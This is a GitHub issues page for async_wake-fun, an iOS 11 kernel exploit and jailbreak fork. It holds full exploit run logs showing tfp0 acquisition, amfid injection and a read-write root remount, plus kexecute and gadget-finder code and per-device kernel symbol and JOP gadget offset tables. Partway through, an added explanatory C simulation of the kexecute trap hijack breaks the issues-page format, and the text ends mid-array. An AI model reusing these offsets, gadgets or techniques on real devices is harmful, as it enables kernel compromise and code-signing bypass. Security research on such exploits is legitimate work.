ninjaprawn / async_wake-fun

async_wake with a bit of fun! - async_awake by Ian Beer (https://bugs.chromium.org/p/project-zero/issues/detail?id=1417#c3)

Objective-C 29.21% C 70.79%


async_wake-fun's Issues

Kernel panic on iPad Air 2

The app causes a kernel panic on iPad Air 2.
The crash happens in:

void let_the_fun_begin(mach_port_t tfp0, mach_port_t user_client) {
...
    uint64_t bol = ZM_FIX_ADDR(kexecute(0xFFFFFFF0074A68C8+slide, 1, 0, 0, 0, 0, 0, 0));
...
}
uint64_t kexecute(mach_port_t user_client, uint64_t fake_client, uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6) {
...
    uint64_t returnval = iokit_user_client_trap(user_client, 0, (uint64_t)(x1), (uint64_t)(x2), (uint64_t)(x3), (uint64_t)(x4), (uint64_t)(x5), (uint64_t)(x6)); // <---  crash is here
}

What is the constant address 0xFFFFFFF0074A68C8?

ssh broken?

Last login: Sun Dec 17 17:35:38 on ttys005
Donovans-MBP:~ donovansims$ ssh root@(IP address)
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ECDSA key sent by the remote host is
SHA256:EyIR5McNaLzh7beO1kzlF70NsZd6LuJxjhPco+0CNZ4.
Please contact your system administrator.
Add correct host key in /Users/donovansims/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /Users/donovansims/.ssh/known_hosts:2
ECDSA host key for (IP address) has changed and you have requested strict checking.
Host key verification failed.
Donovans-MBP:~ donovansims$

What does that mean?

Kernel Crashes On iPhone SE 11.1.2

Here Is The Log

no symbols for this device yet
tfp0 should still work, but the kernel debugger PoC won't
message size for kalloc.4096: 2956
got user client: 0x6107
[+] prepared kqueue
task self: 0xfffffff005f1b1e0
our task port is at 0xfffffff005f1b1e0
found target port with suitable allocation page offset: 0xfffffff007dc8e70
replacer_body_size: 0xb74
message_body_offset: 0x448
0 e00002c9 0 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199
got replaced with replacer port 30
found kernel vm_map: 0xfffffff11c452420
second time got replaced with replacer port 0
will try to read from second port (fake kernel)
kernel read via fake kernel task port worked?
0x0000000000420000
0x0000000000000000
0xfffffff11c47a3c0
0xfffffff11c47a4b0
about to build safer tfp0
message buffer: fffffff006c61000
fake_kernel_task_kaddr: fffffff006c61000
read fake_task_refs: d00d
about to test new tfp0
kernel read via second tfp0 port worked?
0x0000000000420000
0x0000000000000000
0xfffffff11c47a3c0
0xfffffff11c47a4b0
built safer tfp0
about to clear up
cleared up
tfp0: 1888a0b
[fun] slide: 0x0000000018200000
[fun] Created fake_vtable at fffffff002000000
[fun] Copied some of the vtable over
[fun] Created fake_client at fffffff002004000
[fun] Copied the user client over
[fun] Wrote the add x0, x0, #0x40; ret; gadget over getExternalTrapForIndex

Kernel panic on iPhone SE

My phone would normally generate a kernel panic stating that there was a kernel stack memory corruption detected. I commented out that one line and everything worked fine (despite it not being able to read/write to kernel memory). Can anyone help?

[@ninjaprawn] questions about amfid

@ninjaprawn. Did you test inject_amfid? Did you run the apps from the shell on the device?
I opened shell access to the device and I saw that inject_amfid is in the zombie state (see below). Could you explain the idea of inject_amfid in detail?
In my understanding, you try to hook the function MISValidateSignatureAndCopyInfo() in libmis.dylib by means of
remote_write(mach_task_self(), binary_load_address()+patch_offset, (uint64_t)&fake_func_addr, 8);
to redirect the call to fake_MISValidateSignatureAndCopyInfo() located in amfid_payload.dylib.
But how will "amfid" call the fake_MISValidateSignatureAndCopyInfo() located in another address space (in inject_amfid)?
Also, I didn't notice messages from amfid_payload.m.

242 ?? SXs 0:02.31 /var/containers/Bundle/Application/F67C6B2C-F295-4442-9B16-81D88984FD3E/async_wake_ios.app/async_wake_ios
243 ?? Z 0:00.00 (inject_amfid)
244 ?? S 0:00.01 /usr/bin/bash

....

id
uid=0(root) gid=0(wheel) egid=501(mobile) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),20(staff),29(certusers),80(admin)

ls -al
total 3
drwxrwxr-t 20 root admin 640 Dec 24 14:01 .
drwxrwxr-t 20 root admin 640 Dec 24 14:01 ..
dr-xr-xr-t@ 2 root wheel 64 Nov 15 03:09 .HFS+ Private Directory Data
-rw-r--r-- 1 root admin 0 Dec 24 14:01 .bit_of_fun
---------- 1 root admin 0 Oct 3 05:38 .file
drwx------ 2 root wheel 64 Sep 30 06:28 .mb
drwxrwxr-x 65 root admin 2080 Nov 15 03:20 Applications
drwxrwxr-t 8 root admin 340 Oct 13 11:13 Developer
drwxrwxr-x 19 root admin 608 Nov 15 03:20 Library
drwxr-xr-x 3 root wheel 96 Sep 29 23:19 System
drwxr-xr-x 4 root wheel 128 Nov 15 03:20 bin
drwxrwxr-t 2 root admin 64 Oct 3 05:38 cores
dr-xr-xr-x 3 root wheel 1442 Dec 24 22:39 dev
lrwxr-xr-x 1 root admin 11 Nov 15 03:20 etc -> private/etc
dr----x--x 5 root admin 160 Dec 24 22:46 fun_bins
drwxr-xr-x 5 root wheel 160 Dec 13 14:37 private
drwxr-xr-x 14 root wheel 448 Nov 15 03:20 sbin
lrwxr-xr-x 1 root admin 15 Nov 15 03:20 tmp -> private/var/tmp
drwxr-xr-x 9 root wheel 288 Dec 13 14:36 usr
lrwxr-xr-x 1 root admin 11 Nov 15 03:20 var -> private/var

Crashing issue

addr_t find_add_x0_x0_0x40_ret(void) {
addr_t off;
uint32_t *k;
k = (uint32_t *)(kernel + xnucore_base);
for (off = 0; off < xnucore_size - 4; off += 4, k++) {
if (k[0] == 0x91010000 && k[1] == 0xD65F03C0) {
return off + xnucore_base + kerndumpbase;
}
}
k = (uint32_t *)(kernel + prelink_base);
for (off = 0; off < prelink_size - 4; off += 4, k++) {
if (k[0] == 0x91010000 && k[1] == 0xD65F03C0) {
return off + prelink_base + kerndumpbase;
}
}
return 0;
}

"terminated due to signal 9" on output

Last version worked just fine before the AMFI commit, now this is my output

build_id: 15B202
sysname: Darwin
nodename: Alexs-iPhone
release: 17.2.0
version: Darwin Kernel Version 17.2.0: Fri Sep 29 18:14:50 PDT 2017; root:xnu-4570.20.62~4/RELEASE_ARM64_T8010
machine: iPhone9,3
this is iPhone 7, should work!
message size for kalloc.4096: 2956
got user client: 0x6207
[+] prepared kqueue
task self: 0xffffffe003f1a610
our task port is at 0xffffffe003f1a610
found target port with suitable allocation page offset: 0xffffffe006e75d88
replacer_body_size: 0xb74
message_body_offset: 0x448
0 e00002c9 0 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199
got replaced with replacer port 42
found kernel vm_map: 0xfffffff10e4660c0
second time got replaced with replacer port 0
will try to read from second port (fake kernel)
kernel read via fake kernel task port worked?
0x0000000000420000
0x0000000000000000
0xfffffff10e48e280
0xffffffe003ee1f90
about to build safer tfp0
message buffer: ffffffe006e19000
fake_kernel_task_kaddr: ffffffe006e19000
read fake_task_refs: d00d
about to test new tfp0
kernel read via second tfp0 port worked?
0x0000000000420000
0x0000000000000000
0xfffffff10e48e280
0xffffffe003ee1f90
built safer tfp0
about to clear up
cleared up
tfp0: 1888b0b
have symbols for this device, testing the kernel debugger...
trying to pin to cpu0: fffffff012a2d098
pin_current_thread yielding cpu
pin_current_thread back on cpu
running on fffffff012a2d098
message buffer: ffffffe006e18000
message buffer: ffffffe006f70c00
message buffer: ffffffe006e1a000
kcall object allocated via early_kalloc at ffffffe006e1a000
return val 1888f0b
returned from trying to set the KDE bit
thread_t_addr: ffffffe004202030
bvr0 read from the DebugData: 0xfffffff012839b20
bcr0 read from the DebugData: 0x000001e5
set ARM_DBG_CR_MODE_CONTROL_ANY
started monitor thread
message buffer: ffffffe006f70400
monitor thread running, pinning to core
message buffer: ffffffe006f70000
trying to pin to cpu0: fffffff012a2d098
pin_current_thread yielding cpu
pin_current_thread back on cpu
running on fffffff012a2d098
monitor thread pinned
kstackptr: ffffffe0a93d3ca0
sp: ffffffe0a93d3270
found the saved state probably at ffffffe0a93d3360
0000004800000015 ffffffe005291d70 ffffffe003ef8290 ffffffe003ef82d0 ffffffe003ef82a8 0000000000000000 0000000000000000 000000000000000b 0000000000000000 ffffffe004202030 0000000000000003 0000000000000004 0000000000000009 0000000000000009 ffffffe005291d70 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 ffffffe006f70400 ffffffe003ef8290 fffffff0124ae7d8 fffffff0124ae7d8 00000000000000ec ffffffe004202030 0000000000000000 ffffffe006f70448 ffffffe006f70510 0000000000000004 ffffffe0a93d3c80 fffffff0125deeb0 ffffffe0a93d3b50 fffffff012839b20 ffffffe020000104 000000016d683060 0000002cc6000022 000000016d33c9f0 0000008400000017 00000000035e6400
a different string!
return val 1888f0b
syscall returned
monitor exited
slide: 0x000000000b400000
Created fake_vtable at ffffffe00003c000
Copied some of the vtable over
Created fake_client at ffffffe000040000
Copied the user client over
Wrote the add x0, x0, #0x40; ret; gadget over getExternalTrapForIndex
found amfid - getting task
our proc is at 0xffffffe005291d70
kern proc is at 0xfffffff012a4dd10
our uid is 0
wrote test file: 0x103002488
remounting: 0
File already exists! Did we mount / as read+write? yes
trust cache at: ffffffe003adb800
19 19 19 19 80000022 02 0b 0e 1b 25 2a 80000028 2c 0c 0c 0c 0c 26 29 49840 - 1008 0000029d
19 19 19 19 80000022 02 0b 0e 1b 25 2a 80000028 2c 0c 26 29 72208 - 752 000002bc
240
rv=0
2017-12-17 16:26:47.795 test_fsigned[240:4843] hi there im trying to live ok empower
2017-12-17 16:26:52.821 test_fsigned[240:4843] Springboard: (os/kern) failure
2017-12-17 16:26:52.834575+0200 async_wake_ios[236:4685] ♫ KPP never bothered me anyway... ♫
Message from debugger: Terminated due to signal 9

and the app crashes.

iPhone 7, iOS 11.1.2, built on macOS 10.13.2, 2009 MacBook Pro.

kcall vs kexecute

@ninjaprawn Is there any difference between Ian Beer's kcall method and your kexecute? You have edited a few lines in kcall, so why don't you use kcall instead of creating kexecute?
Please answer me, I really want to know.
Thanks a lot :)
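The iPad Air 2 crash report above places the fault inside iokit_user_client_trap, and the iPhone 7 log shows the step that makes kexecute work: "Created fake_vtable", "Created fake_client", then "Wrote the add x0, x0, #0x40; ret; gadget over getExternalTrapForIndex". The following added example is a userland model of that mechanism, written for this page; it is not code from async_wake-fun or from Ian Beer's async_wake. It mirrors the public XNU logic of iokit_user_client_trap and IOUserClient::getTargetAndTrapForIndex (the trap lookup returns an IOExternalTrap {object, func}, and func is called as a method on object with the six trap arguments). The struct layout, the vtable slot index 0, and every sim_ name are assumptions made for the model; only the 0x40 displacement comes from the gadget named in the log.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Signature of the function reached through the trap: x0 is the "object",
 * x1..x6 are the six trap arguments p1..p6. */
typedef uint64_t (*sim_kfunc_t)(uint64_t, uint64_t, uint64_t, uint64_t,
                                uint64_t, uint64_t, uint64_t);

/* Model of XNU's IOExternalTrap { IOService *object; IOTrap func; }. */
typedef struct {
    uint64_t    object;
    sim_kfunc_t func;
} sim_external_trap_t;

struct fake_client;
typedef sim_external_trap_t *(*sim_get_trap_fn)(struct fake_client *self, uint32_t index);

/* Model of the fake IOUserClient the exploit builds: a fake vtable whose
 * getExternalTrapForIndex slot points at the gadget, and an IOExternalTrap
 * placed exactly 0x40 bytes into the object (assumed layout). */
typedef struct fake_client {
    sim_get_trap_fn     *vtable;                   /* offset 0, as for any C++ object */
    uint8_t              pad[0x40 - sizeof(void *)];
    sim_external_trap_t  trap;                     /* must land at this + 0x40 */
} fake_client_t;

_Static_assert(offsetof(fake_client_t, trap) == 0x40, "trap must sit at this + 0x40");

enum { SIM_SLOT_GET_EXTERNAL_TRAP = 0 };           /* assumed slot index for the model */

/* "add x0, x0, #0x40; ret": ignores the index and returns this + 0x40. */
sim_external_trap_t *sim_gadget_add_x0_x0_0x40_ret(fake_client_t *self, uint32_t index) {
    (void)index;
    return (sim_external_trap_t *)((uint8_t *)self + 0x40);
}

/* Model of iokit_user_client_trap(): look the trap up through the vtable, then
 * call trap->func with trap->object as this. Mirrors XNU's `if (trap && target)`
 * and `if (func)` checks; the real function returns kIOReturnBadArgument otherwise. */
uint64_t sim_user_client_trap(fake_client_t *client, uint32_t index,
                              uint64_t p1, uint64_t p2, uint64_t p3,
                              uint64_t p4, uint64_t p5, uint64_t p6) {
    sim_external_trap_t *trap = client->vtable[SIM_SLOT_GET_EXTERNAL_TRAP](client, index);
    if (trap == NULL || trap->object == 0 || trap->func == NULL)
        return 0xE00002C2u;                        /* kIOReturnBadArgument */
    return trap->func(trap->object, p1, p2, p3, p4, p5, p6);
}

/* Model of kexecute(): stage {x0, addr} at client + 0x40, then trap selector 0
 * with x1..x6, exactly the call shape shown in the iPad Air 2 issue. */
uint64_t sim_kexecute(fake_client_t *client, sim_kfunc_t addr, uint64_t x0,
                      uint64_t x1, uint64_t x2, uint64_t x3,
                      uint64_t x4, uint64_t x5, uint64_t x6) {
    client->trap.object = x0;
    client->trap.func   = addr;
    return sim_user_client_trap(client, 0, x1, x2, x3, x4, x5, x6);
}

/* Stand-in for a kernel function; returns the sum so the argument routing is visible. */
uint64_t sim_kernel_target(uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3,
                           uint64_t x4, uint64_t x5, uint64_t x6) {
    return x0 + x1 + x2 + x3 + x4 + x5 + x6;
}

/* Build the fake client: zero it and point its vtable slot at the gadget. */
void sim_build_fake_client(fake_client_t *client, sim_get_trap_fn *vtable) {
    memset(client, 0, sizeof *client);
    vtable[SIM_SLOT_GET_EXTERNAL_TRAP] = sim_gadget_add_x0_x0_0x40_ret;
    client->vtable = vtable;
}

int main(void) {
    sim_get_trap_fn vtable[1];
    fake_client_t client;
    sim_build_fake_client(&client, vtable);

    /* Before kexecute stages a trap, the zeroed object/func pair is rejected. */
    printf("untouched trap -> 0x%llx\n",
           (unsigned long long)sim_user_client_trap(&client, 0, 1, 2, 3, 4, 5, 6));
    /* kexecute(addr, x0 = 10, x1..x6 = 1..6) -> sim_kernel_target(10, 1, ..., 6) */
    printf("kexecute -> %llu\n",
           (unsigned long long)sim_kexecute(&client, sim_kernel_target, 10, 1, 2, 3, 4, 5, 6));
    return 0;
}
```

The point of the model is the contract kexecute relies on: whatever the gadget returns is dereferenced as an IOExternalTrap, so the two words at client + 0x40 become the callee's this pointer and the target function, and the trap's six arguments arrive in x1..x6. A fake client whose memory at + 0x40 is not fully under your control (or a vtable copy that missed the slot) produces exactly the sort of fault in iokit_user_client_trap reported above.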

Adding New Symbols Doesn't Work

Hi, I added new symbols to get my iPad mini 2 working, while adding a few other symbols for my friends, but in my testing my iPad resprings. Any thoughts?

Here is the console:
build_id: 15B202
sysname: Darwin
nodename: iPad
release: 17.2.0
version: Darwin Kernel Version 17.2.0: Fri Sep 29 18:14:49 PDT 2017; root:xnu-4570.20.62~4/RELEASE_ARM64_S5L8960X
machine: iPad4,4
this is iPad Mini 2 WiFi, should work!
message size for kalloc.4096: 2956
got user client: 0x6107
[+] prepared kqueue
task self: 0xfffffff002afe498
our task port is at 0xfffffff002afe498
found target port with suitable allocation page offset: 0xfffffff005976b90
replacer_body_size: 0xb74
message_body_offset: 0x448
0 e00002c9 0 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199
got replaced with replacer port 52
found kernel vm_map: 0xfffffff11e5866e0
second time got replaced with replacer port 0
will try to read from second port (fake kernel)
kernel read via fake kernel task port worked?
0x0000000000420000
0x0000000000000000
0xfffffff11e590890
0xfffffff11e5907f0
about to build safer tfp0
message buffer: fffffff00f027000
fake_kernel_task_kaddr: fffffff00f027000
read fake_task_refs: d00d
about to test new tfp0
kernel read via second tfp0 port worked?
0x0000000000420000
0x0000000000000000
0xfffffff11e590890
0xfffffff11e5907f0
built safer tfp0
about to clear up
cleared up
tfp0: 188920b
have symbols for this device, testing the kernel debugger...
trying to pin to cpu0: fffffff01e9e90c8
pin_current_thread yielding cpu
pin_current_thread back on cpu
running on fffffff01e9e90c8
message buffer: fffffff00f03e000
message buffer: fffffff00d1fe400
message buffer: fffffff00f03f000
kcall object allocated via early_kalloc at fffffff00f03f000

and these are the offsets I have:
// ip7
uint64_t ksymbols_iphone_7_15B202[] = {
0xfffffff0074d74cc, // KSYMBOL_OSARRAY_GET_META_CLASS,
0xfffffff007566454, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
0xfffffff007567bfc, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
0xfffffff0073eb130, // KSYMBOL_CSBLOB_GET_CD_HASH
0xfffffff007101248, // KSYMBOL_KALLOC_EXTERNAL
0xfffffff007101278, // KSYMBOL_KFREE
0xfffffff0074d74d4, // KYSMBOL_RET
0xfffffff0074f11cc, // KSYMBOL_OSSERIALIZER_SERIALIZE,
0xfffffff00758c618, // KSYMBOL_KPRINTF
0xfffffff0074fc164, // KSYMBOL_UUID_COPY
0xfffffff0075b2000, // KSYMBOL_CPU_DATA_ENTRIES
0xfffffff0070cc1d4, // KSYMBOL_VALID_LINK_REGISTER
0xfffffff0070cc1ac, // KSYMBOL_X21_JOP_GADGET
0xfffffff0070cc474, // KSYMBOL_EXCEPTION_RETURN
0xfffffff0070cc42c, // KSYMBOL_THREAD_EXCEPTION_RETURN
0xfffffff0071e1998, // KSYMBOL_SET_MDSCR_EL1_GADGET
0xfffffff007439b20, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // this is actually 1 instruction in to the entrypoint
0xfffffff0071de074, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP
0xfffffff0071dea24, // KSYMBOL_SLEH_SYNC_EPILOG
};

uint64_t ksymbols_iphone_x_15B202[] = {
0xfffffff0074f9948, // KSYMBOL_OSARRAY_GET_META_CLASS,
0xfffffff00758b03c, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
0xfffffff00758c7b0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
0xfffffff007400974, // KSYMBOL_CSBLOB_GET_CD_HASH
0xfffffff00710232c, // KSYMBOL_KALLOC_EXTERNAL
0xfffffff00710235c, // KSYMBOL_KFREE
0xfffffff007102358, // KYSMBOL_RET
0xfffffff007513324, // KSYMBOL_OSSERIALIZER_SERIALIZE,
0xfffffff0075b2694, // KSYMBOL_KPRINTF
0xfffffff00751e1d8, // KSYMBOL_UUID_COPY
0xfffffff0075d6000, // KSYMBOL_CPU_DATA_ENTRIES
0xfffffff0070cc1d4, // KSYMBOL_VALID_LINK_REGISTER
0xfffffff0070cc1ac, // KSYMBOL_X21_JOP_GADGET
0xfffffff0070cc474, // KSYMBOL_EXCEPTION_RETURN
0xfffffff0070cc42c, // KSYMBOL_THREAD_EXCEPTION_RETURN
0xfffffff0071e8630, // KSYMBOL_SET_MDSCR_EL1_GADGET
0xfffffff007454194, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // this is actually 1 instruction in to the entrypoint
0xfffffff0071e451c, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP
0xfffffff0071e4ed8, // KSYMBOL_SLEH_SYNC_EPILOG
};

uint64_t ksymbols_ipod_touch_6g_15b202[] = {
0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS,
0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
0xFFFFFFF0073B71E4, // KSYMBOL_CSBLOB_GET_CD_HASH
0xFFFFFFF0070C8710, // KSYMBOL_KALLOC_EXTERNAL
0xFFFFFFF0070C8740, // KSYMBOL_KFREE
0xFFFFFFF0070C873C, // KYSMBOL_RET
0xFFFFFFF0074BE978, // KSYMBOL_OSSERIALIZER_SERIALIZE,
0xFFFFFFF007559FD0, // KSYMBOL_KPRINTF
0xFFFFFFF0074C9910, // KSYMBOL_UUID_COPY
0xFFFFFFF00757E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
0xFFFFFFF00709818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
0xFFFFFFF007098164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
0xFFFFFFF0071AD144, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
0xFFFFFFF0074062F4, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};

// 6p (N56ap)
uint64_t ksymbol_iphone_6p_15b202[] = {
0xfffffff0074a4a4c, // __ZNK7OSArray12getMetaClassEv
0xfffffff007533cf8, // __ZNK12IOUserClient12getMetaClassEv
0xfffffff0075354a0, // __ZN12IOUserClient24getTargetAndTrapForIndexEPP9IOServicej
0xfffffff0073b71e4, // _csblob_get_cdhash
0xfffffff0070c8710, // _kalloc_external
0xfffffff0070c8740, // _kfree
0xFFFFFFF0070C873C, // ret
0xfffffff0074be978, // __ZNK12OSSerializer9serializeEP11OSSerialize
0xfffffff007559fd0, // kprintf
0xfffffff0074c9910, // _uuid_copy
0xfffffff00757E000, // _DATA:__data + 0x6000
// 0x4DDE74 +
0xFFFFFFF00709818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
0xFFFFFFF007098180, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
0xFFFFFFF0071ACCB8, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
0xFFFFFFF0074062F0, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."

};

uint64_t ksymbols_iphone_6s_15b202[] = {
0xFFFFFFF00748D548, // KSYMBOL_OSARRAY_GET_META_CLASS,
0xFFFFFFF00751C4D0, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
0xFFFFFFF00751DC78, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
0xFFFFFFF0073A1054, // KSYMBOL_CSBLOB_GET_CD_HASH
0xFFFFFFF0070B8088, // KSYMBOL_KALLOC_EXTERNAL
0xFFFFFFF0070B80B8, // KSYMBOL_KFREE
0xFFFFFFF0070B80B4, // KYSMBOL_RET
0xFFFFFFF0074A7248, // KSYMBOL_OSSERIALIZER_SERIALIZE,
0xFFFFFFF0075426C4, // KSYMBOL_KPRINTF
0xFFFFFFF0074B21E0, // KSYMBOL_UUID_COPY
0xFFFFFFF007566000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
0xFFFFFFF00708818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
0xFFFFFFF007088164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
0xFFFFFFF007088434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
0xFFFFFFF0070883E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
0xFFFFFFF007197AB0, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
0xFFFFFFF0073EFB44, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
0xFFFFFFF0071941D8, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};

uint64_t ksymbols_iphone_6_15b202[] = {
0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS,
0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
0xFFFFFFF0073B71E4, // KSYMBOL_CSBLOB_GET_CD_HASH
0xFFFFFFF0070C8710, // KSYMBOL_KALLOC_EXTERNAL
0xFFFFFFF0070C8740, // KSYMBOL_KFREE
0xFFFFFFF0070C873C, // KYSMBOL_RET
0xFFFFFFF0074BE978, // KSYMBOL_OSSERIALIZER_SERIALIZE,
0xFFFFFFF007559FD0, // KSYMBOL_KPRINTF
0xFFFFFFF0074C9910, // KSYMBOL_UUID_COPY
0xFFFFFFF00757E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
0xFFFFFFF00709818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
0xFFFFFFF007098164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
0xFFFFFFF0071AD144, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
0xFFFFFFF0074062F4, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};

uint64_t ksymbols_ipad_mini_2_wifi_15b202[] = {
0xFFFFFFF0074947EC, // KSYMBOL_OSARRAY_GET_META_CLASS,
0xFFFFFFF007523A98, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
0xFFFFFFF007525240, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
0xFFFFFFF0073A6F84, // KSYMBOL_CSBLOB_GET_CD_HASH
0xFFFFFFF0070B8590, // KSYMBOL_KALLOC_EXTERNAL
